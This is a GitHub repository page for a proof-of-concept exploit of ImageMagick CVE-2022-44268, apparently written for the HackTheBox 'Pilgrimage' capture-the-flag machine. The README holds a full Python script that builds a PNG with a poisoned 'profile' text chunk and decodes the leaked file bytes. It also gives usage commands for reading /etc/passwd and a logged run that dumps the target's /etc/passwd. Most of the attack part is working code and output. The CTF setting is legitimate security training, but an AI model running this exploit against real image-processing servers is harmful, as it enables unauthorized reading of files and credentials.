https://github.com/bhattjayd/pilgrimagectfexploit
- Host: GitHub
- URL: https://github.com/bhattjayd/pilgrimagectfexploit
- Owner: BhattJayD
- Created: 2024-01-01T14:35:01.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2024-01-01T14:49:32.000Z (almost 2 years ago)
- Last Synced: 2024-12-30T07:18:28.110Z (9 months ago)
- Language: Python
- Size: 2.93 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
#### ImageMagick LFI PoC [CVE-2022-44268]
ImageMagick 7.1.0-49 is vulnerable to information disclosure. When it parses a PNG image (e.g., for a resize), the resulting image can have the content of an arbitrary file embedded in it (if the magick binary has permission to read that file): a `tEXt` chunk whose keyword is `profile` is treated as a filename to read, and the file's bytes are written back into the output image as a text chunk.
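The mechanism in working code, as an added example (this is not the repository's `exploit.py` and not ImageMagick code). It writes the `profile` tEXt chunk directly instead of going through pngcrush, and it decodes the hex-encoded `Raw profile type` chunk that a vulnerable ImageMagick writes into the processed image. Everything runs offline on constructed data: `minimal_png` is a 1x1 carrier image, and `fake_processed_png` is a stand-in for the server's response; its chunk keyword (`Raw profile type profile`) and header layout (blank line, description line, decimal length, then 72 hex digits per line) are assumptions about ImageMagick's raw-profile writer, not captured output. The decoder therefore matches any keyword that starts with `Raw profile type` and handles both `tEXt` and deflate-compressed `zTXt` chunks, so it can be pointed at a real downloaded image as well.

```python
import struct
import zlib

# Added example for CVE-2022-44268 (not the repository's exploit.py): build the
# poisoned PNG the README's pngcrush step produces, then decode the
# "Raw profile type" chunk a vulnerable ImageMagick writes back.

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png(width: int = 1, height: int = 1) -> bytes:
    """Valid 8-bit RGBA PNG (opaque red pixels) used as the carrier image."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    scanlines = b"".join(b"\x00" + b"\xff\x00\x00\xff" * width for _ in range(height))
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanlines))
            + png_chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk; rejects a bad signature or CRC."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    off = len(PNG_SIG)
    while off + 12 <= len(png):
        (length,) = struct.unpack(">I", png[off:off + 4])
        ctype = png[off + 4:off + 8]
        data = png[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", png[off + 8 + length:off + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on chunk {ctype!r}")
        yield ctype, data
        off += 12 + length


def insert_after_ihdr(base_png: bytes, ctype: bytes, data: bytes) -> bytes:
    """Re-emit base_png with one extra chunk placed right after IHDR."""
    out = bytearray(PNG_SIG)
    for t, d in iter_chunks(base_png):
        out += png_chunk(t, d)
        if t == b"IHDR":
            out += png_chunk(ctype, data)
    return bytes(out)


def craft_profile_png(base_png: bytes, target_path: str) -> bytes:
    """The trigger: tEXt keyword 'profile' whose value is the file to read."""
    return insert_after_ihdr(base_png, b"tEXt", b"profile\x00" + target_path.encode())


def text_chunks(png: bytes) -> dict:
    """{keyword: text} for every tEXt and zTXt chunk (PNG text is Latin-1)."""
    found = {}
    for ctype, data in iter_chunks(png):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        key, _, rest = data.partition(b"\x00")
        if ctype == b"zTXt":
            rest = zlib.decompress(rest[1:])  # rest[0] is the compression method (0)
        found[key.decode("latin-1")] = rest.decode("latin-1")
    return found


def extract_raw_profiles(png: bytes) -> dict:
    """Decode every 'Raw profile type ...' chunk back into the leaked bytes.
    Layout assumed from ImageMagick's raw-profile writer: blank line,
    description line, decimal length, then hex digits."""
    leaked = {}
    for key, text in text_chunks(png).items():
        if not key.startswith("Raw profile type"):
            continue
        lines = text.split("\n")
        idx = next(i for i, line in enumerate(lines) if line.strip().isdigit())
        declared = int(lines[idx])
        data = bytes.fromhex("".join(lines[idx + 1:]))
        if len(data) != declared:
            raise ValueError(f"{key!r}: got {len(data)} bytes, declared {declared}")
        leaked[key] = data
    return leaked


def fake_processed_png(leaked: bytes, description: str = "/etc/passwd") -> bytes:
    """CONSTRUCTED stand-in for the image a vulnerable server returns, so the
    decoder can be exercised offline. Keyword and layout are assumptions about
    ImageMagick's output; zTXt is used because long profiles get compressed."""
    hexed = leaked.hex()
    body = "\n".join(hexed[i:i + 72] for i in range(0, len(hexed), 72))
    text = f"\n{description}\n{len(leaked):8d}\n{body}\n"
    return insert_after_ihdr(minimal_png(), b"zTXt",
                             b"Raw profile type profile\x00\x00" + zlib.compress(text.encode()))


def demo():
    """Craft the trigger, then decode a constructed response holding sample /etc/passwd lines."""
    poisoned = craft_profile_png(minimal_png(), "/etc/passwd")
    sample = (b"root:x:0:0:root:/root:/bin/bash\n"
              b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")  # constructed
    return text_chunks(poisoned), extract_raw_profiles(fake_processed_png(sample))


if __name__ == "__main__":
    trigger, recovered = demo()
    print("trigger chunk:", trigger)
    for key, data in recovered.items():
        print(f"{key}:\n{data.decode()}")
```

Against the Pilgrimage flow shown below, the same two halves apply: upload the PNG from `craft_profile_png`, download the shrunk image, and pass its bytes to `extract_raw_profiles`; `identify -verbose` from the requirements section prints the same hex under Properties if you prefer to eyeball it.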
#### Usage
```bash
python3 exploit.py <image.png> <file-to-read>
```
e.g.:
```bash
python3 exploit.py gopro.png /etc/passwd
```
#### Requirements
```bash
sudo apt-get install pngcrush imagemagick exiftool exiv2 -y
```
#### Example response
```bash
$python3 exploit.py ../gopro.png /etc/passwd
Argument 1: /etc/passwd
sigining up for cookies
got the cookies PHPSESSID=nhidflc7k6merrhit3ljp656g1; path=/ response
file uploading/?message=http://pilgrimage.htb/shrunk/6592cfb863794.png&status=success
file uploaded
saved filename : 6592cfb863794.png now downloading file
wget http://pilgrimage.htb/shrunk/6592cfb863794.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
eXXXy:x:1000:1000:eXXXy,,,:/home/eXXXy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```